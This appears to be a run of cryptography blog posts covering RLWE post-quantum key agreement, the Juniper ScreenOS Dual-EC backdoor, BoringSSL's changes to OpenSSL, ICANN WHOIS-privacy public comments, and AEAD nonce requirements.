If large quantum computers can be built (and not of the D-Wave variety) then they'll make quite a mess of public-key cryptography. RSA and systems based on discrete logarithms (i.e. finite-field and elliptic-curve Diffie-Hellman) are all broken. I've written about hash-based signatures (which resist quantum attacks) before and the recent PQCRYPTO recommendations suggest those for signatures and McEliece for public-key encryption. Those are both sound, conservative recommendations but both have some size problems: McEliece public keys can be on the order of a megabyte of data and conservative hash-based signatures are about 40KB.

In some situations that's not a problem, and things like firmware signatures, where the key is embedded in hard-to-change silicon, should consider using hash-based signatures today. But those costs motivate the search for post-quantum schemes that are closer to the small, fast primitives that we have today.

One candidate is called Ring Learning-With-Errors (RLWE) and I'll try to give a taste of how it works in this post. This is strongly based on the A New Hope paper by Alkim, Ducas, Pöppelmann & Schwabe, and, in turn, on papers by Bos, Costello, Naehrig & Stebila and Peikert.

Firstly, the basic stats (because I always hate having to dig around for these values in papers). I've included the numbers for a current, elliptic-curve based Diffie-Hellman scheme (X25519) for comparision:

A New HopeX25519
Alice's transmission size1,824 bytesa32 bytes
Alice's computation129,638 cyclesb331,568 cyclesc
Bob's transmission size1,824 bytes32 bytes
Bob's computation126,236 cycles331,568 cycles

(a This is using a more compact scheme than in the paper. b These are Haswell cycle counts from the paper. c These are values from the SUPERCOP benchmark on titan0.)

Something to keep in mind when looking at the numbers above: sending 1,824 bytes on a 10MBit link takes 5.1 million cycles, assuming that your CPU is running at 3.5GHz.

RLWE key agreement

Our fundamental setting is ℤ12289[X]/(X1024+1). That's the set of polynomial equations where the largest power of x is 1023 and the coefficients are values between zero and 12288 (inclusive). For example, 66 + 4532x + 10000x2 + … + 872x1023.

Addition and multiplication can be defined for polynomials in this set. Addition is done by matching up powers of x and adding the corresponding coefficients. If the result is out of range then it's reduced modulo 12289.

Multiplication is high-school polynomial multiplication where the polynomial on the right is multiplied by every term of the polynomial on the left and the result is the sum of those terms. Coefficients are reduced modulo 12289 to keep them in range, but it's likely that the resulting powers of x will be too large—multiplying two x1023 terms gives a result in terms of x2046.

Polynomials with too large a degree can be reduced modulo x1024+1 until they're in range again. So, if we ended up with a term of a×x2046 then we could subtract a×x1022(x1024+1) to eliminate it. By repeated application of that trick, all the terms with powers of x greater than 1023 can be eliminated and then the result is back in the set.

Now that we can add and multiply within this set of polynomials we need to define a noise polynomial: this is simply a polynomial where each coefficient is sampled from a random distribution. In this case, the distribution will be a centered binomial distribution that ranges from -12 to 12. The probability density looks like this:

image/svg+xml Gnuplot Gnuplot Produced by GNUPLOT 5.0 patchlevel 1 0 -15 -10 -5 0 5 10 15

An important feature of noise polynomials is that the magnitude of each coefficient is small. That will be critical later on.

A random polynomial is one where each coefficient is sampled from a uniform distribution over the full range of zero to 12288.

To build a Diffie-Hellman protocol from this, Alice generates a random polynomial, a, and two noise polynomials, s and e. Alice calculates b = as+e and sends a and b to Bob. Bob generates his own s′ and e′, uses Alice's a to calculate u = as′+e′, and sends u back to Alice. Now Alice can calculate us = (as′+e′)s = as′s+e′s and Bob can calculate bs′ = (as+e)s′ = ass′+es′. But the keen-eyed will notice that those are different values!

The added noise is necessary for security but it means that the two sides to this protocol calculate different values. But, while the values are different, they're very similar because the magnitude of the noise polynomials is small. So a reconciliation mechanism is needed to find a shared value given two, similar polynomials.

Reconciliation

So far I've been following the A New Hope paper and it does include a reconciliation mechanism. But, to be honest, I'm not sure that I understand it, so I'm going to be describing a mechanism by Peikert here:

The reconciliation will treat each coefficient in the similar polynomials separately and will extract a single, shared bit from each. Since we're dealing with polynomials that have 1024 terms, we'll get a 1024-bit shared secret in total but I'm just going to discuss the process of processing a single coefficient to get a single bit.

Consider the coefficient space as a circle: zero and 12289 are the same value modulo 12289 and we put that at the top of the circle. At the bottom of the circle will be 12289/2 = 6144 (rounding down). We know that, for each coefficient, Alice and Bob will have similar values—meaning that the values will be close by on the circle.

image/svg+xml 0 6144

One option is to split the circle into left and right halves and say that if the point is in the left half then it's a zero, otherwise it's a one.

image/svg+xml 0 6144 0 1

But while that will work most of the time, there's obviously a problem when the points are near the top or the bottom. In these cases, a small difference in location can result in a point being in a different half, and thus Alice and Bob will get a different result.

In this case we want to split the circle into top (zero) and bottom (one), so that both points are clearly in the bottom half.

image/svg+xml 0 6144 0 1

But that just moves the problem around to the left and right edges of the circle. So how about we vary the basis in which we measure the points depending where they are? If the point is near the bottom or the top we'll use the top–bottom (blue) basis and, if not, we'll use the left–right (red) basis.

image/svg+xml 0 6144

But there's still a problem! Consider the two points in the diagram just above. One party will think that it's in a red area, measure it left–right and conclude that the shared bit is a zero. The other will think it's in a blue area, measure it top–bottom and conclude that the shared bit is a one.

There isn't a solution to this in which the parties operate independently so, instead, one of the parties chooses the basis in which each coefficient will be measured. This information is a single bit of information (i.e. red or blue) that we have Bob send to Alice along with his value u. With this reconciliation information in hand, both parties can measure their points in the same, optimal basis and calculate the same, shared value.

Optimisations

There's lots in the paper that I've skipped over here. Most importantly (for performance), a variant of the Fourier transform can be used to convert the polynomials into the frequency domain where multiplication is much faster. Some of the values transmitted can be transmitted in the frequency domain too to save conversions overall. Also, random polynomials can be sampled directly in the frequency domain.

The parameters here have also been carefully selected so that the reduction stage of multiplication happens magically, just by point-wise multiplication of a some constants before and after the transform.

The a value that Alice generates could be a global constant, but in order to save worrying about how it was generated, and to eliminate the possibility of all-for-the-price-of-one attacks (like LogJam), it's generated fresh for each instance. Rather than transmit it in full, Alice need only send a seed value for it to Bob.

Contrasts with Diffie-Hellman

The most important change from Diffie-Hellman is that this scheme requires that all values be ephemeral. Both QUIC and TLS 1.3 assume that a Diffie-Hellman public-value can be reused but, in this scheme, that breaks the security of the system. More traditional uses of Diffie-Hellman, e.g. TLS 1.2 and SSH, are fine though.

Another important change is that this scheme takes a full round-trip for Alice. With Diffie-Hellman, both parties can transmit a message at time zero and as soon as the other party has received the message, they can calculate the shared key and start transmitting. But even if the a value is a global constant in this scheme, the reconciliation process means that Bob can't send a message until he's received Alice's message, and Alice can't calculate the shared key until she has received Bob's message. So Alice has a wait a full round-trip.

Often that limitation isn't important because other parts of the protocol already require the round-trip (for example, in TLS). But for some uses it's a critical difference.

Also, since this protocol involves random noise it has a failure probability: it's possible that the reconciliation mechanism produces different answers for each side. Thankfully this probability can be made negligible (i.e. less than one in 264).

I should also note that the RLWE problem is hypothesised to be resistant to quantum attack, but we don't know that. We also don't know that it's resistant to attacks by classical computers! It's possible that someone will develop a classical algorithm tomorrow that breaks the scheme above. Thus it should be used concurrently with a standard Diffie-Hellman (e.g. X25519) and the outputs of each should concatenated as the input keying material for a KDF.

Juniper: recording some Twitter conversations

Update: Ralf wrote up some notes from his work. These now include an update themselves with information from Willem Pinckaers that suggests that the presumed Dual-EC output is exposed to the world in Juniper devices.

On Thursday, Juniper announced that some of their products were affected by “unauthorized code in ScreenOS that could allow a knowledgeable attacker to gain administrative access to NetScreen® devices and to decrypt VPN connections”. That sounds like an attacker managed to subvert Juniper's source code repository and insert a backdoor. Of course, any glimpses that we get of these sorts of attacks are fascinating.

Juniper followed up with a slightly more detailed post that noted that there were two backdoors: one via SSH and one that “may allow a knowledgeable attacker who can monitor VPN traffic to decrypt that traffic”. Either of these would be very interesting to a nation-state attacker but that latter—passive decryption of VPN connections—is really in their neighborhood.

So, of course, smarter people than I quickly took to Twitter to pull apart the differences in the fixed firmware versions. Since Twitter conversations are terrible to try and pick apart after the fact, I'm writing down the gist of things here. But I'm just the scribe in this case; other people did the work.

One of the first things that people focused on was a difference to a large, hex value that was visible by just diffing the strings of the two firmwares. That change is interesting not just because it's a large, opaque hex string in a binary, but because of the hex strings that immediately precede it. Specially they were:

  • FFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF: this is the prime order of the underlying field of P-256, a standard elliptic curve.
  • FFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFC: P-256 is typically written in short-Weierstrass form: y2=x3+ax+b. This is then the a value for P-256.
  • 5AC635D8AA3A93E7B3EBBD55769886BC651D06B0CC53B0F63BCE3C3E27D2604B: This is the b value for the P-256 equation.
  • 6B17D1F2E12C4247F8BCE6E563A440F277037D812DEB33A0F4A13945D898C296: This is the x coordinate for the standard generator of P-256—the starting point for operations on the curve.
  • FFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551: This is the number of points on P-256.

So all the values just before the changed one are constants for P-256, suggesting that the changed value is cryptographic too. The obvious, missing value would be the y coordinate for the standard generator. One possibility was that the attack put in the wrong y value. This could put the generator on the wrong curve, say a weaker curve that shares most of the same parameters as P-256 but with a different value for b. But the curve that would have resulted, while weaker, wasn't real-time-passive-decryption weak. Also the replacement value in the fixed version wasn't the standard y value either.

Ralf-Philipp Weinmann was looking at the code itself and found:

That means that the changed value is an x coordinate and that the code was calculating the y value from it given the curve equation. Thus it would only need the x values and the points would always be on the correct curve. So perhaps it's a public key for something?

Changing a public key could easily be a big backdoor, but recall that the result here is somehow passive decryption of VPN traffic. It's unclear how changing a public key could result in passive decryption.

Oh dear. To explain: “EC PRNG” suggests that the value might be a constant in an elliptic-curve based pseudo-random number generator. That could certainly explain how passive decryption of VPN traffic was possible because it brings up memories of Dual-EC. Dual-EC was an NSA effort to introduce a backdoored pseudo-random number generator (PRNG) that, given knowledge of a secret key, allowed an attacker to observe output from the RNG and then predict its future output. If an attacker can predict the output of the PRNG then they can know the keys that one or both sides of a VPN connection will choose and decrypt it. (For more details, see the research paper.)

Indeed, it quickly came to light that Juniper have a page where they say that the VPN devices in question here “do utilize Dual_EC_DRBG, but do not use the pre-defined points cited by NIST”. In short, they used a backdoored RNG but changed the locks. Then this attack might be explained by saying that someone broke in and changed the locks again.

We're not sure that's actually what happened, but it seems like a reasonable hypothesis at this point. If it's correct, this is fairly bananas. Dual-EC is not a reasonable RNG: it's massively larger, slower and more complex than standard RNGs. It's output isn't even very uniform. Huge compromises were made in its design in order to meet its primary objective: to be a NOBUS, passive backdoor. (“NOBUS” is an intelligence community term for “nobody but us”, i.e. other parties shouldn't be able to use the backdoor.) Why would it be used in ScreenOS in the first place?

Again, assuming this hypothesis is correct then, if it wasn't the NSA who did this, we have a case where a US government backdoor effort (Dual-EC) laid the groundwork for someone else to attack US interests. Certainly this attack would be a lot easier given the presence of a backdoor-friendly RNG already in place. And I've not even discussed the SSH backdoor which, as Wired notes, could have been the work of a different group entirely. That backdoor certainly isn't NOBUS—Fox-IT claim to have found the backdoor password in six hours.

BoringSSL

We recently switched Google's two billion line repository over to BoringSSL, our fork of OpenSSL. This means that BoringSSL is now powering Chromium (on nearly all platforms), Android M and Google's production services. For the first time, the majority of Google's products are sharing a single TLS stack and making changes no longer involves several days of work juggling patch files across multiple repositories.

This is a big positive for Google and I'm going to document some of the changes that we've made in BoringSSL in this post. I am not saying that people should be ditching OpenSSL and switching to BoringSSL. For Linux distributions that doesn't even make sense because we've removed too much for many applications to run unaltered and, without linker trickery, it's not possible to have both OpenSSL and BoringSSL in the same process because their symbols will collide. Even if you're in the position of shipping your own TLS stack with your code, you should still heed the warnings in the README well.

OpenSSL have considerably improved their processes since last April, which is great and important because huge swathes of the Internet will continue to depend on it. BoringSSL started before those changes but, even taking them into consideration, I'm still happy with my decision to fork. (But note that Google employs OpenSSL team members Emilia Käsper, Bodo Möller and Ben Laurie and contributes monetarily via the Core Infrastructure Initiative, so we haven't dropped our support of OpenSSL as a project.)

With that in mind, I'm going to mention some of the cleanups that we've done in BoringSSL from the lowest level, upwards. While most people should continue to use OpenSSL, there are lots of developers outside of Google who work on Chromium and Android and thus this document shouldn't be internal to Google. This post may seem critical of OpenSSL, but remember that many of these changes are possible because we only have to worry about Google's needs—we have an order of magnitude fewer platforms and configurations to support than OpenSSL and we don't keep any ABI compatibility. We also have the superpower of being able to change, where needed, the code that calls BoringSSL, so you can't really compare the two.

The “we”, above, is primarily myself and my colleagues David Benjamin and Matt Braithwaite. But BoringSSL is open source and Brian Smith has clocked up 55 patches and we've also had contributions from Opera and CloudFlare. (Brian's number would be higher if I had had more time to review his pending changes in the past couple of weeks).

“Forking”

Generally when people say “forking” they mean that they took a copy of the code and started landing patches independently of the original source. That's not what we did with BoringSSL. Rather than start with a copy, I started with an empty directory and went through OpenSSL function-by-function, reformatting, cleaning up (sometimes discarding) and documenting each one. So BoringSSL headers and sources look like this rather than this. The comments in BoringSSL headers can be extracted by a tool to produce documentation of a sort. (Although it could do with a make-over.)

(Clang's formatting tool and its Vim integration are very helpful! It's been the biggest improvement in my code-editing experience in many years.)

For much of the code, lengths were converted from ints to size_ts and functions that returned one, zero or minus one were converted to just returning one or zero. (Not handling a minus one return value is an easy and dangerous mistake.)

I didn't always get everything right: sometimes I discarded a function that we later found we actually needed or I changed something that, on balance, wasn't worth the changes required in other code. Where possible, code that we've needed to bring back has gone into a separate section called “decrepit” which isn't built in Chromium or Android.

But large amounts of OpenSSL could simply be discarded given our more limited scope. All the following were simply never copied into the main BoringSSL: Blowfish, Camllia, CMS, compression, the ENGINE code, IDEA, JPAKE, Kerberos, MD2, MDC2, OCSP, PKCS#7, RC5, RIPE-MD, SEED, SRP, timestamping and Whirlpool. The OpenSSL that we started from has about 468,000 lines of code but, today, even with the things that we've added (including tests) BoringSSL is just 200,000. Even projects that were using OpenSSL's OPENSSL_NO_x defines to exclude functionality at compile time have seen binaries sizes drop by 300KB when switching to BoringSSL.

Some important bits of OpenSSL are too large to bite off all at once, however. The SSL, ASN.1 and X.509 code were “forked” in the traditional sense: they were copied with minimal changes and improved incrementally. (Or, in the case of ASN.1 and X.509, left alone until they could be replaced completely.)

The lowest-levels

OpenSSL has a confusing number of initialisation functions. Code that uses OpenSSL generally takes a shotgun approach to calling some subset of OpenSSL_­add_­all_­algorithms, SSL_­library_­init, ERR_­load_­crypto_­strings and the deprecated SSLeay aliases of the same. BoringSSL doesn't need any of them; everything works immediately and the errors don't print out funny just because you forgot to load the error strings. If, like Chromium, you care about avoiding static initialisation (because every disk seek to load pages of code delays displaying the window at startup) then you can build with BORINGSSL_­NO_­STATIC_­INITIALIZER and initialise the library when you need with CRYPTO_­library_­init. But the vast majority of code just wants to avoid having to think about it. In the future, we would like to move to an automatic lazy-init which would solve even Chromium's needs.

OpenSSL and BoringSSL are often built into shared libraries, but OpenSSL doesn't have any visibility annotations. By default symbols are not hidden and ELF requires that any non-hidden symbols can be interposed. So if you look at libcrypto.so in a Linux distribution you'll see lots of internal functions polluting the dynamic symbol table and calls to those functions from within the library have to indirect via the PLT. BoringSSL builds with hidden visibility by default so calls to internal functions are direct and only functions marked OPENSSL_­EXPORT are included in the dynamic symbol table.

Multi-threaded code is common these days but OpenSSL requires that you install callbacks to lock and unlock a conceptual array of locks. This trips up people who now take thread-safety to be a given, and can also mean that contention profiling shows a large, opaque amount of contention in the locking callback with no hint as to the real source. BoringSSL has a native concept of locks so is thread-safe by default. It also has “once” objects, atomic reference counting and thread-local storage, which eliminates much of the need for locking in the first place.

Errors

OpenSSL has a fairly unique method of handling errors: it pushes errors onto a per-thread queue as the stack unwinds. This means that OpenSSL errors can generally give you something like a stack trace that you might expect from gdb or a Python exception, which is definitely helpful in some cases. For contrast, NSS (Mozilla's crypto library) uses a more traditional, errno-like system of error codes. Debugging an NSS error involves looking up the numeric error code and then grepping the source code to find all the places where that error code can be set and figuring out which triggered this time.

However, this single error-code system is better for programmatic use. Code that tries to do something with OpenSSL errors (other than dumping them for human debugging) tends to look only at the first (i.e. deepest) error on the queue and tries to match on the reason or even function code. Thus changing the name of even internal functions could break calling code because these names were implicitly exported by the error system. Adding errors could also break code because now a different error could be first in the queue. Lastly, forgetting to clear the error queue after a failed function is very easy to do and thus endemic.

So BoringSSL no longer saves functions in the error queue: they all appear as OPENSSL_­internal, which saved about 15KB of binary size alone. As a bonus, we no longer need to run a script every time we add a new function. The file name and line number is still saved but, thankfully, I've never seen code try to match line numbers from the error queue. Trying to match on reason codes is still problematic, but we're living with it for now. We also have no good answer for forgetting to clear the error queue. It's possible that we'll change things in the future to automatically clear the error queue when calling most functions as, now that we're using thread-local storage, that'll no longer cause servers to burst into a flaming ball of lock contention. But we've not done that yet.

Parsing and serialisation

OpenSSL's parsing and serialisation involves a lot of incrementing pointers with single-letter names. BoringSSL drags this firmly into the 1990's with functions that automatically check bounds for parsing and functions that automatically resize buffers for serialisation. This code also handles parsing and serialising ASN.1 in an imperative fashion and we're slowly switching over to these functions because the OpenSSL ASN.1 code is just too complicated for us.

But I should note that OpenSSL's master branch now uses some similar parsing functions for parsing TLS structures at least. I've no idea whether that was inspired by BoringSSL, but it's great to see.

Random number generation

Random number generation in OpenSSL suffers because entropy used to be really difficult. There were entropy files on disk that applications would read and write, timestamps and PIDs would be mixed into entropy pools and applications would try other tricks to gather entropy and mix it into the pool. That has all made OpenSSL complicated.

BoringSSL just uses urandom—it's the right answer. (Although we'll probably do it via getrandom rather than /dev/urandom in the future.) There are no return values that you can forget to check: if anything goes wrong, it crashes the address space.

For the vast majority of code, that's all that you need to know, although there are some concessions to performance in the details:

TLS servers that are pushing lots of AES-CBC need the RNG to be really fast because each record needs a random IV. Because of this, if BoringSSL detects that the machine supports Intel's RDRAND instruction, it'll read a seed from urandom, expand it with ChaCha20 and XOR entropy from RDRAND. The seed is thread-local and refreshed every 1024 calls or 1MB output, whichever happens first.

Authenticated Encryption

Handing people a block cipher and hash function and expecting them to figure out the rest does not work. Authenticated Encryption is much closer to being reasonable and BoringSSL promotes it where possible. One very pleasing BoringSSL tale is that I handed that header file to a non-crypto developer and they produced secure code, first time. That would not have happened had I pointed them at EVP_CIPHER.

There is more to be done here as I've talked about before: we need nonce-misuse-resistant primitives and solutions for large files but what we have now is a significant improvement and the foundations for that future work are now in place.

SSL/TLS

As I mentioned, the SSL/TLS code wasn't reworked function-by-function like most of BoringSSL. It was copied whole and incrementally improved, predominantly by David Benjamin. I'm really happy with what he's managed to do with it.

At the small scale, most of the parsing and serialisation is now using the safe functions that I covered above. (Changes to convert most of the remaining pointer-juggling code are in my review queue.) TLS extensions are now a bit saner and no longer handled with huge switch statements. Support for SSLv2, DSS, SRP and Kerberos has all been dropped. The header file actually has comments.

Some important, small scale cleanups are less obvious. The large number of “functions” that were actually macros around ctrl functions (that bypassed the type system) are now real functions. In order to get TLS 1.0–1.2 you no longer use the ridiculously named SSLv23_method and then disable SSLv2 and SSLv3 by setting options on the SSL_CTX, rather you use TLS_method and control the versions by setting a minimum and maximum version.

There is lots more that I could mention like that.

At the larger scale, the buffer handling code has been substantially improved and the TLS code now does symmetric crypto using the AEAD interface, which cleanly partitions concerns that previously leaked all over the SSL code. We've also rewritten the version negotiation code so it no longer preprocesses the ClientHello and fiddles with method tables to use the correct version. This avoids some duplicated code and session resumption bugs and OpenSSL has since done a similar rewrite for 1.1.0. To solve a particular problem for Chrome, we've added some support for asynchronous private key operations so that slow smartcards don't block the network thread. Much of the DTLS logic has also been rewritten or pruned.

Perhaps most importantly, the state machine is much reduced. Renegotiation has been dropped except for the case of a TLS client handling renegotiation from a server while the application data flow has stopped, and even that is disabled by default. The DTLS code (a source of many bugs) is much saner in light of this.

Testing

OpenSSL has always had decent test coverage of lower-level parts like hash functions and ciphers, but testing of the more complex SSL/TLS code has been lacking. Testing that code is harder because you need to be able to produce sufficiently correct handshakes to get close to its edge cases, but you don't want to litter your real code with dozens of options for producing incorrect outputs in order to hit them. In BoringSSL, we've solved this by using a copy of Go's TLS stack for testing and we've littered it with such options. Our tests also stress asynchronous resume points across a range of handshakes. We wrote partial DTLS support in Go to test DTLS-only edge cases like reassembly, replay and retransmission. Along the way, we even discovered one of OpenSSL's old bug workarounds didn't work, allowing both projects to shed some code.

In C, any malloc call may fail. OpenSSL attempts to handle this, but such code is error-prone and rarely tested. It's best to use a malloc which crashes on failure, but for the benefit of consumers who can't, we have a "malloc test" mode. This runs all tests repeatedly, causing each successive allocation to fail, looking for crashes.

We now have 1,139 TLS tests which gives us 70% coverage of the TLS code—still better than any other TLS library that we've used.

The future

Now that we've done the task of aligning Google around BoringSSL, we'll hopefully be able to turn a little bit more attention to some feature work. Support for the IETF-approved ChaCha20-Poly1305 is coming soon. (Brian Smith has a change waiting for me.) Curve25519 and Ed25519 support are likely too. Next year, we will probably start on TLS 1.3 support.

But more cleanups are probably more important. The big one is the elimination of the ASN.1 and X.509 code in many cases. If you recall, we imported that code whole without cleanups and it hasn't been touched since. We've been incrementally replacing uses of the ASN.1 code with the new CBS and CBB functions but X.509 remains as a substantial user. We're not going to be able to drop that code completely because too much expects the X.509 functions to be available for reading and writing certificates, but we can make it so that the rest of the code doesn't depend on it. Then we can put it in a separate library and drop in a new certificate verification library that some of my Chromium colleagues are writing. Most users of BoringSSL will then, transparently, end up using the new library.

In the SSL code, the SSL object itself is a mess. We need to partition state that's really needed for the whole connection from state that can be thrown away after the handshake from state that can be optionally discarded after the handshake. That will save memory in servers as well as improving the clarity of the code. Since we don't have ABI compatibility, we can also reorder the structs to pack them better.

Lastly, we need to make fuzzing part of our process. Michał Zalewski's AFL has substantially improved the state of fuzzing but, whether we're using AFL or LibFuzzer, it's still a one-off for us. It should be much more like our CI builders. So should running clang-analyzer.

(David Benjamin contributed to this post.)

The ICANN Public Comments on WHOIS Privacy

ICANN is currently considering a proposal that “domains used for online financial transactions for commercial purpose should be ineligible for [WHOIS] privacy and proxy registrations” [PDF]. Given the vagueness around what would count as “commercial purpose” (tip jars? advertising? promoting your Kickstarter?) and concerns that some commercial sites are for small, home-run businesses, quite a lot of people are grumpy about this.

ICANN has a public comment period on this document until July 7th and what's interesting is that the comments (those that were emailed at least) are all in a mailing list archive. When you submit to the comment address (comments-ppsai-initial-05may15@icann.org) you receive a confirmation email with a link that needs to be followed and quite a clear statement that the comments are public, so I think that this is deliberate.

I was curious what the comments box on this sort of topic is full of so did a quick analysis. The comment period doesn't close until July 7th so obviously I'm missing a couple of days worth of responses, but it was a two month comment period so that doesn't seem too bad.

When I checked there were 11,017 messages and 9,648 (87.6%) of them were strongly based on the Respect Our Privacy form letter. Several hundred additional messages included wording from it so I think that campaign resulted in about 90% of messages. (And it's worth noting the the primary flow on that site is to call ICANN—of course, I've no data on the volume of phone calls that resulted.)

Another campaign site, Save Domain Privacy, has a petition and quite a few messages included its wording.

I classified all such messages as “against” and wrote a quick program to manually review the remaining messages that weren't trivially classifiable by string matching against those template messages.

  • Nine messages were so odd or confused that it's unclear what the writer believed.
  • Three messages were asking questions and not expressing an opinion.
  • Two messages were sufficiently equivocal that they didn't express a clear feeling in either direction.
  • One message was commenting on a different section of the document.
  • One message suggested that WHOIS privacy be available to all, but that it should have a significant (monetary) cost in order to discourage its use.

Many more messages were against and not based on either of the two template letters. That leaves 13 messages that expressed support for the proposal. (That's 0.12% for those who are counting, although I very much question how much meaning that number has.):

  • Three messages suggested that private WHOIS registration was contrary to the openness of the Internet.
  • Three messages believed that shutting down sites that infringe copyright, or sell counterfeit trademarked goods, was a compelling reason.
  • Two writers believed that it was compelling, in general, to have contact details for websites. One of who claimed to be a security researcher and wanted CERTs to have access to full WHOIS details.
  • Two messages suggested that it would hinder “cyber-bullies” and “pædophiles”, one of which described how hard it was to have a stalker's site shut down.
  • One author believed that being able to contact site owners in the event of a domain-name dispute was a compelling reason.
  • One message suggested that WHOIS privacy should be removed for all .com sites, but no others.
  • One commenter opined that the Internet is inherently hostile to privacy and thus those who want privacy should not register domains.

The comment period opened on May 5th, but between then and June 22nd there were only seven messages. However, the week of the 22nd brought 10,015 messages. The the week of the 29th brought 995 more. So I think it's clear that, without significant outside promotion of these topics, almost nobody would have noticed this proposal.

AEADs: getting better at symmetric cryptography

I gave a talk a couple of weeks ago at the Yahoo Unconference. The conference was at the end of a particually hard week for a bunch of reasons and I fear that the talk wasn't that great. (Afterwards I got home about 3pm and pretty much slept until the following morning.) This post is a, hopefully clearer, articulation of its contents.

I've been primarily working on getting Google products switched over to BoringSSL for a little over a year now. (Chromium is done on many platforms and AOSP switched recently.) This is neccessary work, but it doesn't exactly lend itself to talk material. So the talk was titled “Lessons Learnt from Questions”—the idea being that smart developers at Google often ask lots of cryptography questions, and from those questions one can tell what is unclear in existing documentation. Points that are not obvious to smart, non-experts are thus good topics to talk about because it's likely that lots of people are missing them.

I was aiming for an hour but, due to a misunderstanding in the weeks prior, I thought that I had to cut it down to 20 minutes, so I ditched all but one question:

“How do I encrypt lots of records given a per-user key?” —Anonymous developer

This question is about applying symmetric cryptography, which is the originally motivation of all of cryptography. You would have thought that we would have figured it out by now, but we totally haven't.

In the 1990's it was common for cryptographers to produce block ciphers and hash functions, and then developers would be tasked with composing them. In the talk I stepped through the design of, and attacks on, the SSLv3/TLS CBC construction as a demonstration that plausible-sounding design features can lead to disaster, but I'm going to omit that here because it worked better live. (Phillip Rogaway tried to warn about these issues when SSL, IPSec, etc were being developed, but sadly the right people didn't listen to him.)

So, for quite a long time now, cryptographers have understood that block ciphers and hash functions are too low-level an abstraction and that the constructions themselves need to be studied and standardised. The result is called authenticated encryption (AE), and let's ponder what it might look like.

Obviously an AE function must take some plaintext and, if it's symmetric encryption, it must take a key. We also assume that its going to take care of both confidentiality and authenticity for us, so not only will an attacker not be able to tell the plaintext from the ciphertext but, if the ciphertext is altered in any way, the decryption will fail cleanly. So let's experiment with a hypothetical SSH-like protocol that's trying to protect a series of key presses:

AE(key, plaintext) → ciphertext

AE(key, ‘h’) → α
AE(key, ‘e’) → β
AE(key, ‘l’) → γ
AE(key, ‘l’) → γ
AE(key, ‘o’) → δ

Oh no! The two l's in “hello” turned into the same ciphertext, so an attacker can see patterns in the input reflected in the ciphertext. That's pretty terrible; clearly we need our AE function to map the same plaintext to different ciphertexts. There's two ways that can happen: either the function is non-deterministic (i.e. it reads entropy internally as a hidden input), or we pass in some varying argument. Explicit is better than implicit so we choose the latter and add an argument called the nonce:

AE(key, plaintext, nonce) → ciphertext

AE(key, ‘h’, n0) → (α, n0)
AE(key, ‘e’, n1) → (β, n1)
AE(key, ‘l’, n2) → (γ, n2)
AE(key, ‘l’, n3) → (ɛ, n3)
AE(key, ‘o’, n4) → (δ, n4)

We assume that n0…4 are all distinct and thus the two l's now get different ciphertexts and patterns in the plaintext have been eliminated. Note that (for now) we need to include the nonce value with the ciphertext because it'll be needed when decrypting.

(As an aside: if you've done anything with cryptography before you've probably come across the acronym “IV”, for initialisation vector. Although not completely standard, I differentiate an IV and an nonce thus: an IV needs to be unpredictable while an nonce needs only to be distinct. The values 0, 1, 2, … are distinct, but they aren't unpredictable. For something like CBC mode, which needs an IV, using a counter would be unacceptable.)

We solved one problem but there's another thing that an evil attacker might do: reorder messages:

AE(key, ‘h’, n0) → (α, n0)(γ, n2)
AE(key, ‘e’, n1) → (β, n1)(δ, n4)
AE(key, ‘l’, n2) → (γ, n2)…untrusted network…(α, n0)
AE(key, ‘l’, n3) → (ɛ, n3)(ɛ, n3)
AE(key, ‘o’, n4) → (δ, n4)(β, n1)

All the ciphertexts on the right are perfectly valid and coupled with a valid nonce, but they end up decrypting to “lohle”—hardly what was intended.

There are two solutions to this. The first is to use an implicit nonce: don't transmit the nonce, just use a counter for each direction. Now, if a message is out of order, the receiver will attempt to decrypt it with the wrong nonce and it'll fail to decrypt. That works perfectly well for transport protocols like SSH and TLS because it's easy to keep a counter in those situations, but sometimes the problem isn't quite so synchronous. For these cases, one could include a sequence number or other context in the plaintext and that works fine, but it's a waste of space if the receiver already knew the information and just wanted to confirm it.

This motivates a common extension to authenticated encryption called authenticated encryption with associated data (AEAD). The associated data is another argument, of arbitrary length, which must be equal at the encryption and decryption ends:

AEAD(key, plaintext, nonce, ad) → ciphertext

AEAD(key, ‘h’, n0, 0) → (α, n0)
AEAD(key, ‘e’, n1, 1) → (β, n1)
AEAD(key, ‘l’, n2, 2) → (γ, n2)
AEAD(key, ‘l’, n3, 3) → (ɛ, n3)
AEAD(key, ‘o’, n4, 4) → (δ, n4)

In this example the associated data happens to be a counter, but it could be anything. The associated data isn't included in the ciphertext, but it must be identical when decrypting otherwise the decryption will fail. In other protocols it could equally well be some context denoting, say, the first or last record. This is the second solution to the reordering problem.

The associated data might seem quite a lot like an nonce. They both need to be presented at encryption and decryption time and they must both match for decryption to succeed, so why do we bother having both? Mostly because the associated data is free-form: you can have as much or as little of it as you like and you can repeat it etc. The requirements of an nonce are much stricter, in fact if you remember only one thing from this please remember this, which I'm calling The Law of AEADs:

Thou shall never reuse the same (key, nonce) pair, for all time. (With high probability.)

So, if you generate a random key and use it to encrypt a single message, it's ok to set the nonce to zero. If you generate a random key and encrypt a series of messages you must ensure that the nonce never repeats. A counter is one way to do this, but if you need to store that counter on disk then stop: the chances of you screwing up and reusing an nonce value are way too high in designs like that.

It would be nice if reusing an nonce just meant that the same plaintext would result in the same ciphertext. That's the least bad thing that an AEAD could do in that situation. However the reality is significantly worse: common AEADs tend to lose confidentiality of messages with a repeated nonce and authenticity tends to collaspe completely for all messages. (I.e. it's very bad.) We like these common AEADs because they're fast, but you must have a solid story about nonce uniqueness. AEADs like AES-GCM and ChaCha20-Poly1305 fail in this fashion.

So what should you do when using a counter isn't trivially safe? One option is to generate the nonce at random and consider the probability of duplicates. AES-GCM takes a 96-bit nonce and NIST says that you can only encrypt 232 messages under a single key if using random nonces. This is because if you throw 232 balls at 296 buckets then you have roughly a 2-33 chance of getting two in the same bucket and NIST drew the line there. That probability might seem either high or low to you. It's pretty small in absolute terms and, unlike a work factor, an attacker can't spend resources against it, but it's a very long way from the safety margins that we usually use in cryptography. So there are also functions like crypto_­secretbox_­xsalsa20­poly1305 (from NaCl) that have a 192-bit nonce. The probabilities with random nonces are much more comforting at that size.

